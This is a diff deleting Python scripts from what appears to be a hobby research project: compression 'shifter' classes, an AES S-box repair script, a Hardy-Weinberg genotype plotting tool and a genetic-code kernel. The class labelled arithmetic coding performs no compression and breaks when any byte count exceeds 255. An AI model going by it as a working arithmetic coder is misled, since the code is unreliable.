|
||||||
class ArithmeticCodingShifter(Shifter):
|
|
||||||
name = "arithmetic"
|
|
||||||
description = "Arithmetic coding (frequency-based range encoding)"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
if len(data) == 0:
|
|
||||||
return state.update(data, cls.name, {'freqs': []})
|
|
||||||
freq = Counter(data)
|
|
||||||
total = len(data)
|
|
||||||
enc_data = bytearray()
|
|
||||||
enc_data.extend(total.to_bytes(4, 'big'))
|
|
||||||
for sym in range(256):
|
|
||||||
f = freq.get(sym, 0)
|
|
||||||
enc_data.append(f)
|
|
||||||
enc_data.extend(data)
|
|
||||||
meta = {'freqs': dict(freq), 'total': total}
|
|
||||||
return state.update(bytes(enc_data), cls.name, meta)
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
if len(data) == 0:
|
|
||||||
return state.update(data, f"decode_{cls.name}")
|
|
||||||
total = int.from_bytes(data[:4], 'big')
|
|
||||||
header_size = 4 + 256
|
|
||||||
result = data[header_size:header_size + total]
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 32: LZW (Lempel-Ziv-Welch)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class LZWShifter(Shifter):
|
|
||||||
name = "lzw"
|
|
||||||
description = "LZW dictionary compression (max 4096 entries)"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
max_dict = kwargs.get('max_dict', 4096)
|
|
||||||
if len(data) == 0:
|
|
||||||
return state.update(data, cls.name, {'max_dict': max_dict})
|
|
||||||
dictionary = {bytes([b]): b for b in range(256)}
|
|
||||||
next_code = 256
|
|
||||||
result = bytearray()
|
|
||||||
w = b""
|
|
||||||
for b in data:
|
|
||||||
wc = w + bytes([b])
|
|
||||||
if wc in dictionary:
|
|
||||||
w = wc
|
|
||||||
else:
|
|
||||||
result.extend(dictionary[w].to_bytes(2, 'big'))
|
|
||||||
if next_code < max_dict:
|
|
||||||
dictionary[wc] = next_code
|
|
||||||
next_code += 1
|
|
||||||
w = bytes([b])
|
|
||||||
if w:
|
|
||||||
result.extend(dictionary[w].to_bytes(2, 'big'))
|
|
||||||
return state.update(bytes(result), cls.name, {'max_dict': max_dict})
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
meta = state.metadata.get(cls.name, {})
|
|
||||||
max_dict = kwargs.get('max_dict', meta.get('max_dict', 4096))
|
|
||||||
if len(data) < 2:
|
|
||||||
return state.update(data, f"decode_{cls.name}")
|
|
||||||
dictionary = {i: bytes([i]) for i in range(256)}
|
|
||||||
next_code = 256
|
|
||||||
result = bytearray()
|
|
||||||
old_code = int.from_bytes(data[:2], 'big')
|
|
||||||
if old_code >= 256:
|
|
||||||
return state.update(data, f"decode_{cls.name}")
|
|
||||||
s = dictionary[old_code]
|
|
||||||
result.extend(s)
|
|
||||||
for i in range(2, len(data), 2):
|
|
||||||
if i + 1 >= len(data):
|
|
||||||
break
|
|
||||||
code = int.from_bytes(data[i:i+2], 'big')
|
|
||||||
if code in dictionary:
|
|
||||||
s = dictionary[code]
|
|
||||||
elif code == next_code:
|
|
||||||
s = dictionary[old_code] + bytes([dictionary[old_code][0]])
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
result.extend(s)
|
|
||||||
if next_code < max_dict:
|
|
||||||
dictionary[next_code] = dictionary[old_code] + bytes([s[0]])
|
|
||||||
next_code += 1
|
|
||||||
old_code = code
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 33: DELTA (Simple inter-byte delta)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class DeltaShifter(Shifter):
|
|
||||||
name = "delta"
|
|
||||||
description = "Simple inter-byte delta encoding (reversible)"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
result = bytearray()
|
|
||||||
prev = 0
|
|
||||||
for b in data:
|
|
||||||
delta = (b - prev) & 0xFF
|
|
||||||
result.append(delta)
|
|
||||||
prev = b
|
|
||||||
result.append(prev)
|
|
||||||
return state.update(bytes(result), cls.name, {'method': 'inter_byte_delta'})
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state, **kwargs):
|
|
||||||
data = bytes(state.encoded) if state.encoded else bytes(state.raw_bytes)
|
|
||||||
if len(data) < 2:
|
|
||||||
return state.update(data, f"decode_{cls.name}")
|
|
||||||
result = bytearray()
|
|
||||||
acc = 0
|
|
||||||
for b in data[:-1]:
|
|
||||||
acc = (acc + b) & 0xFF
|
|
||||||
result.append(acc)
|
|
||||||
return state.update(bytes(result), f"decode_{cls.name}")
|
|
||||||
|
|
||||||
|
|
||||||
SHIFTER_BASES['bwt'] = 3.0
|
|
||||||
SHIFTER_BASES['mtf'] = 2.0
|
|
||||||
SHIFTER_BASES['arithmetic'] = 4.0
|
|
||||||
SHIFTER_BASES['lzw'] = 3.5
|
|
||||||
SHIFTER_BASES['delta'] = 1.5
|
|
||||||
"""
|
|
||||||
|
|
||||||
insert_point = content.rfind('\nALL_SHIFTERS = [')
|
|
||||||
if insert_point > 0:
|
|
||||||
content = content[:insert_point] + new_s + content[insert_point:]
|
|
||||||
print("Fix 5: new shifters inserted before ALL_SHIFTERS")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 5: insertion point NOT found")
|
|
||||||
|
|
||||||
# Add to ALL_SHIFTERS
|
|
||||||
old_list = 'ALL_SHIFTERS = [\n\n HachimojiShifter, AEGISShifter, NaturalDNAShifter,'
|
|
||||||
new_list = 'ALL_SHIFTERS = [\n\n BWTShifter, MTFShifter, ArithmeticCodingShifter, LZWShifter, DeltaShifter,\n HachimojiShifter, AEGISShifter, NaturalDNAShifter,'
|
|
||||||
if old_list in content:
|
|
||||||
content = content.replace(old_list, new_list)
|
|
||||||
print("Fix 5: shifters added to ALL_SHIFTERS list")
|
|
||||||
changes += 1
|
|
||||||
else:
|
|
||||||
print("Fix 5: ALL_SHIFTERS pattern NOT found")
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'w') as f:
|
|
||||||
f.write(content)
|
|
||||||
|
|
||||||
print(f"\n=== DONE: {changes} changes applied ===")
|
|
||||||
print("Final file length:", len(content), "bytes")
|
|
||||||
|
|
@ -1,67 +0,0 @@
|
||||||
import os
|
|
||||||
os.chdir('/home/allaun/Documents/Research Stack/3-Mathematical-Models')
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'r') as f:
|
|
||||||
content = f.read()
|
|
||||||
|
|
||||||
# The SBOX is corrupted with duplicate values (0x6d, 0x6c appear multiple times).
|
|
||||||
# Replace with correct AES S-Box
|
|
||||||
correct_sbox = [
|
|
||||||
0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,
|
|
||||||
0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,
|
|
||||||
0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,
|
|
||||||
0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,
|
|
||||||
0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,
|
|
||||||
0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,
|
|
||||||
0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,
|
|
||||||
0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,
|
|
||||||
0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,
|
|
||||||
0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,
|
|
||||||
0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,
|
|
||||||
0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,
|
|
||||||
0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,
|
|
||||||
0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,
|
|
||||||
0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,
|
|
||||||
0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16,
|
|
||||||
]
|
|
||||||
|
|
||||||
# Find and replace the SBOX definition
|
|
||||||
# The current SBOX starts at a specific line. Let's find it.
|
|
||||||
old_start = " SBOX = ["
|
|
||||||
old_end = " ]"
|
|
||||||
|
|
||||||
# Find the SBOX definition
|
|
||||||
idx_start = content.find(" SBOX = [")
|
|
||||||
if idx_start > 0:
|
|
||||||
idx_end = content.find("\n # Inverse S-Box", idx_start)
|
|
||||||
if idx_end > idx_start:
|
|
||||||
# Build replacement
|
|
||||||
sbox_lines = " SBOX = [\n"
|
|
||||||
for i in range(0, 256, 16):
|
|
||||||
chunk = correct_sbox[i:i+16]
|
|
||||||
hex_vals = ",".join(f"0x{v:02x}" for v in chunk)
|
|
||||||
sbox_lines += f" {hex_vals},\n"
|
|
||||||
sbox_lines += " ]"
|
|
||||||
|
|
||||||
old_sbox_block = content[idx_start:idx_end]
|
|
||||||
content = content[:idx_start] + sbox_lines + content[idx_end:]
|
|
||||||
print("SBOX replaced with correct AES S-Box")
|
|
||||||
else:
|
|
||||||
print("Could not find end of SBOX definition")
|
|
||||||
else:
|
|
||||||
print("Could not find SBOX definition")
|
|
||||||
|
|
||||||
with open('pist_biological_polymorphic_shifter_v3_complete.py', 'w') as f:
|
|
||||||
f.write(content)
|
|
||||||
|
|
||||||
# Verify no duplicates
|
|
||||||
s = set()
|
|
||||||
has_dup = False
|
|
||||||
for v in correct_sbox:
|
|
||||||
if v in s:
|
|
||||||
print(f"DUPLICATE: {v}")
|
|
||||||
has_dup = True
|
|
||||||
s.add(v)
|
|
||||||
if not has_dup:
|
|
||||||
print("SBOX has all unique values (bijection confirmed)")
|
|
||||||
print("Length:", len(content))
|
|
||||||
|
|
@ -1,213 +0,0 @@
|
||||||
import pandas as pd
|
|
||||||
import numpy as np
|
|
||||||
import matplotlib.pyplot as plt
|
|
||||||
plt.style.use('ggplot')
|
|
||||||
#Load CSV
|
|
||||||
Sample=pd.read_csv("populations.csv", index_col=False)
|
|
||||||
|
|
||||||
#Calculating genotype frequencies
|
|
||||||
AA_list = []
|
|
||||||
Aa_list = []
|
|
||||||
aa_list = []
|
|
||||||
|
|
||||||
def calculate_genotype_frequencies(p,q):
|
|
||||||
AA = round(p**2,2)
|
|
||||||
Aa = round(2*p*q,2)
|
|
||||||
aa = round(q**2,4)
|
|
||||||
|
|
||||||
return AA,Aa,aa
|
|
||||||
|
|
||||||
for index, row in Sample.iterrows():
|
|
||||||
p = row['Allele_A_Freq']
|
|
||||||
q = row['Allele_a_Freq']
|
|
||||||
|
|
||||||
AA, Aa, aa = calculate_genotype_frequencies(p, q)
|
|
||||||
|
|
||||||
AA_list.append(AA)
|
|
||||||
Aa_list.append(Aa)
|
|
||||||
aa_list.append(aa)
|
|
||||||
|
|
||||||
Sample['AA']=AA_list
|
|
||||||
Sample['Aa']=Aa_list
|
|
||||||
Sample['aa']=aa_list
|
|
||||||
|
|
||||||
#Output csv
|
|
||||||
Sample.to_csv("Output.csv", index=False)
|
|
||||||
|
|
||||||
#Get available data
|
|
||||||
available_genes = pd.Series(Sample['Gene'].unique())
|
|
||||||
available_populations = pd.Series(Sample['Population'].unique())
|
|
||||||
available_genotypes = ['AA', 'Aa', 'aa']
|
|
||||||
|
|
||||||
#GRAPH 1
|
|
||||||
def GenotypeFrequencyComparisonplot(gene):
|
|
||||||
df_gene = Sample[Sample["Gene"] == gene]
|
|
||||||
|
|
||||||
populations = df_gene["Population"].values
|
|
||||||
AA_vals=df_gene["AA"].values
|
|
||||||
Aa_vals=df_gene["Aa"].values
|
|
||||||
aa_vals=df_gene["aa"].values
|
|
||||||
|
|
||||||
x = np.arange(len(populations))
|
|
||||||
width=0.25
|
|
||||||
|
|
||||||
bar_AA=plt.bar(x-width, AA_vals, width, label="AA")
|
|
||||||
bar_Aa=plt.bar(x, Aa_vals,width, label="Aa")
|
|
||||||
bar_aa=plt.bar(x+width, aa_vals,width, label="aa")
|
|
||||||
|
|
||||||
for i in range(len(populations)):
|
|
||||||
plt.text(x[i]-width, AA_vals[i]+0.01, f"{AA_vals[i]:.2f}", ha='center', fontsize=9)
|
|
||||||
plt.text(x[i], Aa_vals[i]+0.02, f"{Aa_vals[i]:.2f}", ha='center', fontsize=9)
|
|
||||||
plt.text(x[i]+width, aa_vals[i]+0.02, f"{aa_vals[i]:.4f}", ha='center', fontsize=9)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
plt.xticks(x,populations)
|
|
||||||
plt.title(f"Variation of genotypes for {gene} across different populations")
|
|
||||||
plt.xlabel("Populations")
|
|
||||||
plt.ylabel("Genotype Frequency")
|
|
||||||
plt.ylim(0,1)
|
|
||||||
plt.legend()
|
|
||||||
plt.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
# --- Console summary ---
|
|
||||||
print(f"\nSummary for {gene}:")
|
|
||||||
print(f"- Highest AA frequency: {df_gene['AA'].max()} in {df_gene['Population'][df_gene['AA'].idxmax()]}")
|
|
||||||
print(f"- Highest Aa frequency: {df_gene['Aa'].max()} in {df_gene['Population'][df_gene['Aa'].idxmax()]}")
|
|
||||||
print(f"- Highest aa frequency: {df_gene['aa'].max()} in {df_gene['Population'][df_gene['aa'].idxmax()]}")
|
|
||||||
|
|
||||||
gene_interpretations = {
|
|
||||||
'ACKR1': 'High aa frequency in Tropical environment reflects strong malaria selection pressure.',
|
|
||||||
'SLC24A5': 'High AA frequency in Temperate environment reflects UV-driven pigmentation selection.',
|
|
||||||
'EPAS1': 'Variation reflects altitude-based oxygen adaptation across environments.',
|
|
||||||
'HBB': 'Sickle cell trait maintained in Tropical environments as malaria resistance.',
|
|
||||||
'LCT': 'Lactase persistence higher in populations with pastoral/dairy farming history.',
|
|
||||||
'CFTR': 'Cystic fibrosis variant predominantly found in Temperate populations.',
|
|
||||||
'MC1R': 'Red hair/freckles variant rare globally, highest in Temperate environments.',
|
|
||||||
'TYR': 'Pigmentation variant frequency inversely correlates with UV exposure.',
|
|
||||||
'FTO': 'Obesity risk allele shows relatively uniform distribution across environments.',
|
|
||||||
'APOE': 'Alzheimers risk allele frequency varies across environmental populations.'
|
|
||||||
}
|
|
||||||
|
|
||||||
print(f"- {gene_interpretations.get(gene, 'Population variation reflects environmental selection pressures.')}")
|
|
||||||
|
|
||||||
#GRAPH 2
|
|
||||||
def GenotypeComparisonOfGenes(population, genotype):
|
|
||||||
df_population=Sample[Sample["Population"]==population]
|
|
||||||
df_genotype=df_population[genotype]
|
|
||||||
genes = df_population["Gene"]
|
|
||||||
|
|
||||||
plt.bar(genes, df_genotype)
|
|
||||||
plt.xlabel("Genes")
|
|
||||||
plt.ylabel("Frequency")
|
|
||||||
plt.title(f"Comparison of {genotype} frequency across genes in {population}")
|
|
||||||
plt.ylim(0,1)
|
|
||||||
|
|
||||||
for i in range(len(genes)):
|
|
||||||
plt.text(i, df_genotype.iloc[i]+0.02,
|
|
||||||
f"{df_genotype.iloc[i]:.3f}", ha='center', fontsize=9)
|
|
||||||
plt.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
# --- Console summary ---
|
|
||||||
print(f"\nSummary for {genotype} in {population}:")
|
|
||||||
print(f"- Highest {genotype} frequency: {df_population[genotype].max():.3f} in {df_population['Gene'][df_population[genotype].idxmax()]}")
|
|
||||||
print(f"- Lowest {genotype} frequency: {df_population[genotype].min():.3f} in {df_population['Gene'][df_population[genotype].idxmin()]}")
|
|
||||||
|
|
||||||
# Dynamic interpretation
|
|
||||||
if genotype == "aa":
|
|
||||||
print(f"- Genes with high aa frequency in {population} suggest stronger recessive selection pressure in this environment.")
|
|
||||||
elif genotype == "AA":
|
|
||||||
print(f"- Genes with high AA frequency in {population} suggest dominant allele advantage in this environment.")
|
|
||||||
elif genotype == "Aa":
|
|
||||||
print(f"- High Aa frequency indicates heterozygote advantage, common in disease resistance genes.")
|
|
||||||
|
|
||||||
#GRAPH 3
|
|
||||||
def AlleleFrequency(gene):
|
|
||||||
df_gene=Sample[Sample["Gene"]==gene]
|
|
||||||
|
|
||||||
populations = df_gene["Population"]
|
|
||||||
p = df_gene["Allele_A_Freq"]
|
|
||||||
q = df_gene["Allele_a_Freq"]
|
|
||||||
|
|
||||||
x = np.arange(len(populations))
|
|
||||||
width=0.25
|
|
||||||
|
|
||||||
bar1=plt.bar(x-width, p, width, label="f(A)")
|
|
||||||
bar2=plt.bar(x, q, width, label="f(a)")
|
|
||||||
plt.title(f"Allelic frequencies of {gene} across different populations")
|
|
||||||
plt.xlabel("Populations")
|
|
||||||
plt.ylabel("Frequencies")
|
|
||||||
|
|
||||||
for i in range(len(populations)):
|
|
||||||
plt.text(x[i]-width, p.iloc[i], f"{p.iloc[i]}", ha='center', fontsize=9)
|
|
||||||
plt.text(x[i], q.iloc[i], f"{q.iloc[i]}", ha='center', fontsize=9)
|
|
||||||
|
|
||||||
plt.legend()
|
|
||||||
plt.xticks(x,populations)
|
|
||||||
plt.ylim(0,1)
|
|
||||||
plt.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
# --- Console summary ---
|
|
||||||
print(f"\nSummary for {gene} allele frequencies:")
|
|
||||||
dominant = "A" if df_gene['Allele_A_Freq'].mean() > df_gene['Allele_a_Freq'].mean() else "a"
|
|
||||||
print(f"- Allele {dominant} is dominant across populations for {gene}.")
|
|
||||||
print(f"- Highest Allele A frequency: {df_gene['Allele_A_Freq'].max():.3f} in {df_gene['Population'][df_gene['Allele_A_Freq'].idxmax()]}")
|
|
||||||
print(f"- Highest Allele a frequency: {df_gene['Allele_a_Freq'].max():.3f} in {df_gene['Population'][df_gene['Allele_a_Freq'].idxmax()]}")
|
|
||||||
print(f"- Frequency difference reflects environmental selection on {gene}.")
|
|
||||||
|
|
||||||
|
|
||||||
#UI
|
|
||||||
print("-----------------------------------------")
|
|
||||||
print("-----------------WELCOME-----------------")
|
|
||||||
print("-----------------------------------------")
|
|
||||||
while True:
|
|
||||||
|
|
||||||
print("WHAT WOULD YOU LIKE TO DO?:")
|
|
||||||
print("1. View Sample Data")
|
|
||||||
print("2. GENOTYPE FREQUENCIES OF A GENE ACROSS POPULATIONS.")
|
|
||||||
print("3. GENOTYPE COMPARISON ACROSS GENES.")
|
|
||||||
print("4. ALLELE FREQUENCIES OF A GENE ACROSS POPULATIONS.")
|
|
||||||
ans = input("->(q to quit): ")
|
|
||||||
|
|
||||||
if ans=="1":
|
|
||||||
print(Sample)
|
|
||||||
|
|
||||||
elif ans=="2":
|
|
||||||
while True:
|
|
||||||
print(f"Available Genes: {', '.join(available_genes)}")
|
|
||||||
gene1 = input("Which gene?: ").upper()
|
|
||||||
if gene1 in available_genes.values:
|
|
||||||
GenotypeFrequencyComparisonplot(gene = gene1)
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
print("This gene does not exist in the database. Please select one from the given options.")
|
|
||||||
|
|
||||||
elif ans=="3":
|
|
||||||
while True:
|
|
||||||
print(f"Availabe Populations: {', '.join(available_populations)}")
|
|
||||||
population1=input("Which population?: ")
|
|
||||||
print(f"Available genotypes: {', '.join(available_genotypes)}")
|
|
||||||
genotype1=input("Which genotype?: ")
|
|
||||||
if population1 in available_populations.values and genotype1 in available_genotypes:
|
|
||||||
GenotypeComparisonOfGenes(population=population1, genotype=genotype1)
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
print("Either Population or Genotype wrong. Please select from the given options.")
|
|
||||||
|
|
||||||
elif ans=="4":
|
|
||||||
while True:
|
|
||||||
print(f"Available Genes: {', '.join(available_genes)}")
|
|
||||||
gene1=input("Which gene?: ").upper()
|
|
||||||
if gene1 in available_genes.values:
|
|
||||||
AlleleFrequency(gene=gene1)
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
print("This gene does not exist in the database. Please choose one from the given options.")
|
|
||||||
|
|
||||||
elif ans=="q":
|
|
||||||
print("Okay Bye!")
|
|
||||||
break
|
|
||||||
|
|
||||||
else:
|
|
||||||
print("Invalid input. Please enter 1,2,3 or q.")
|
|
||||||
|
|
||||||
|
|
@ -1,703 +0,0 @@
|
||||||
"""
|
|
||||||
Genetic N-Space Shell Encoding (GENSIS) Kernel
|
|
||||||
===============================================
|
|
||||||
Extends MISC with every known biological/genetic coding system:
|
|
||||||
- Standard/non-standard genetic code tables (64 codons × many variants)
|
|
||||||
- n-dimensional hypercubic shell coordinates (generalized PIST → d-cube)
|
|
||||||
- Cross-dimensional resonance encoding
|
|
||||||
- N-space delta encoding leveraging biological degeneracy
|
|
||||||
|
|
||||||
Pulls from MATH_MODEL_MAP models:
|
|
||||||
182 (Hardy-Weinberg), 271 (Mendelian), 294 (Genomic Entropy),
|
|
||||||
295 (Codon Hamming), 304 (Self-Assembly ΔG), 306 (DNA Tile Logic),
|
|
||||||
412 (RNA Combinators), 413 (BioBrick), 1276-1280 (AVMR Codon Info)
|
|
||||||
"""
|
|
||||||
|
|
||||||
import math, struct, hashlib
|
|
||||||
from collections import Counter, defaultdict
|
|
||||||
from dataclasses import dataclass, field
|
|
||||||
from typing import Dict, List, Optional, Tuple, Set, Any
|
|
||||||
from enum import Enum
|
|
||||||
|
|
||||||
import sys, os
|
|
||||||
sys.path.insert(0, os.path.dirname(__file__))
|
|
||||||
from misc_kernel import Q16_16, SCALE, PI_Q16, cos_q16, exp_q16
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 1. GENETIC CODE TABLES — Every known variant (models 271,294,412)
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
BASES = ['A', 'C', 'G', 'T'] # DNA
|
|
||||||
RNA_BASES = ['A', 'C', 'G', 'U']
|
|
||||||
AMINO_ACIDS = [
|
|
||||||
'Ala','Arg','Asn','Asp','Cys','Gln','Glu','Gly','His','Ile',
|
|
||||||
'Leu','Lys','Met','Phe','Pro','Ser','Thr','Trp','Tyr','Val',
|
|
||||||
'SeCys','Pyl','Stop'
|
|
||||||
]
|
|
||||||
AA_ORDER = {aa: i for i, aa in enumerate(AMINO_ACIDS)}
|
|
||||||
|
|
||||||
|
|
||||||
def _build_standard_table() -> Dict[Tuple[str,str,str], str]:
|
|
||||||
"""Standard genetic code: 64 codons → 20 AAs + Stop"""
|
|
||||||
table = {}
|
|
||||||
bases = ['T', 'C', 'A', 'G']
|
|
||||||
# Standard genetic code mapping (64 entries)
|
|
||||||
std_map = {
|
|
||||||
'TTT':'Phe','TTC':'Phe','TTA':'Leu','TTG':'Leu',
|
|
||||||
'TCT':'Ser','TCC':'Ser','TCA':'Ser','TCG':'Ser',
|
|
||||||
'TAT':'Tyr','TAC':'Tyr','TAA':'Stop','TAG':'Stop',
|
|
||||||
'TGT':'Cys','TGC':'Cys','TGA':'Stop','TGG':'Trp',
|
|
||||||
'CTT':'Leu','CTC':'Leu','CTA':'Leu','CTG':'Leu',
|
|
||||||
'CCT':'Pro','CCC':'Pro','CCA':'Pro','CCG':'Pro',
|
|
||||||
'CAT':'His','CAC':'His','CAA':'Gln','CAG':'Gln',
|
|
||||||
'CGT':'Arg','CGC':'Arg','CGA':'Arg','CGG':'Arg',
|
|
||||||
'ATT':'Ile','ATC':'Ile','ATA':'Ile','ATG':'Met',
|
|
||||||
'ACT':'Thr','ACC':'Thr','ACA':'Thr','ACG':'Thr',
|
|
||||||
'AAT':'Asn','AAC':'Asn','AAA':'Lys','AAG':'Lys',
|
|
||||||
'AGT':'Ser','AGC':'Ser','AGA':'Arg','AGG':'Arg',
|
|
||||||
'GTT':'Val','GTC':'Val','GTA':'Val','GTG':'Val',
|
|
||||||
'GCT':'Ala','GCC':'Ala','GCA':'Ala','GCG':'Ala',
|
|
||||||
'GAT':'Asp','GAC':'Asp','GAA':'Glu','GAG':'Glu',
|
|
||||||
'GGT':'Gly','GGC':'Gly','GGA':'Gly','GGG':'Gly',
|
|
||||||
}
|
|
||||||
for codon_str, aa in std_map.items():
|
|
||||||
table[(codon_str[0], codon_str[1], codon_str[2])] = aa
|
|
||||||
return table
|
|
||||||
|
|
||||||
|
|
||||||
def _build_mito_table() -> Dict[Tuple[str,str,str], str]:
|
|
||||||
"""Vertebrate Mitochondrial Code (model 271 variant)."""
|
|
||||||
table = _build_standard_table()
|
|
||||||
# Reassignments for vertebrate mitochondria
|
|
||||||
table[('A','T','A')] = 'Met' # instead of Ile
|
|
||||||
table[('T','G','A')] = 'Trp' # instead of Stop
|
|
||||||
table[('A','G','A')] = 'Stop' # instead of Arg
|
|
||||||
table[('A','G','G')] = 'Stop' # instead of Arg
|
|
||||||
return table
|
|
||||||
|
|
||||||
|
|
||||||
def _build_ciliate_table() -> Dict[Tuple[str,str,str], str]:
|
|
||||||
"""Ciliate Nuclear Code (model 271 variant)."""
|
|
||||||
table = _build_standard_table()
|
|
||||||
table[('T','A','A')] = 'Gln' # instead of Stop
|
|
||||||
table[('T','A','G')] = 'Gln' # instead of Stop
|
|
||||||
return table
|
|
||||||
|
|
||||||
|
|
||||||
GENETIC_CODE_TABLES = {
|
|
||||||
'standard': _build_standard_table(),
|
|
||||||
'vert_mito': _build_mito_table(),
|
|
||||||
'ciliate': _build_ciliate_table(),
|
|
||||||
# Additional tables can be added similarly
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
# 2. N-DIMENSIONAL SHELL COORDINATE (Generalized PIST)
|
|
||||||
# ════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class NShellCoordinate:
|
|
||||||
"""d-dimensional shell coordinate (generalized PIST).
|
|
||||||
|
|
||||||
Original 2D PIST: k = floor(sqrt(n)), t = n - k², mass = t·(2k+1-t)
|
|
||||||
Generalized d-cube: k = floor(n^(1/d)), t[i] = base-(k+1) digits
|
|
||||||
mass = Π t[i]·(k - t[i] + 1)
|
|
||||||
"""
|
|
||||||
k: int # shell index (d-th root of rank)
|
|
||||||
t: List[int] # offsets per dimension (length d)
|
|
||||||
d: int # number of dimensions
|
|
||||||
|
|
||||||
def __post_init__(self):
|
|
||||||
if len(self.t) != self.d:
|
|
||||||
raise ValueError(f"t length {len(self.t)} != d={self.d}")
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, n: int, d: int = 3) -> 'NShellCoordinate':
|
|
||||||
"""Encode natural number n into d-dimensional shell coordinate.
|
|
||||||
|
|
||||||
n = k^d + Σ t[i]·(k+1)^i where 0 ≤ t[i] ≤ k
|
|
||||||
"""
|
|
||||||
if n < 0:
|
|
||||||
return cls(k=0, t=[0]*d, d=d)
|
|
||||||
if d < 1:
|
|
||||||
return cls(k=0, t=[0], d=1)
|
|
||||||
|
|
||||||
# Integer d-th root for shell index
|
|
||||||
k = int(round(n ** (1.0 / d)))
|
|
||||||
# Adjust for floating point errors
|
|
||||||
while (k + 1) ** d <= n:
|
|
||||||
k += 1
|
|
||||||
while k ** d > n:
|
|
||||||
k -= 1
|
|
||||||
if k < 0:
|
|
||||||
k = 0
|
|
||||||
|
|
||||||
remaining = n - k ** d
|
|
||||||
t = []
|
|
||||||
base = max(k + 1, 1)
|
|
||||||
for _ in range(d):
|
|
||||||
t.append(remaining % base)
|
|
||||||
remaining = remaining // base
|
|
||||||
|
|
||||||
return cls(k=k, t=t, d=d)
|
|
||||||
|
|
||||||
@property
|
|
||||||
def mass(self) -> int:
|
|
||||||
"""d-dimensional hyperbolic hyperbola index.
|
|
||||||
|
|
||||||
mass = 0 iff n is a perfect d-power (all t[i] = 0).
|
|
||||||
This is the generalized zero-mass theorem (model 603 extended).
|
|
||||||
"""
|
|
||||||
m = 1
|
|
||||||
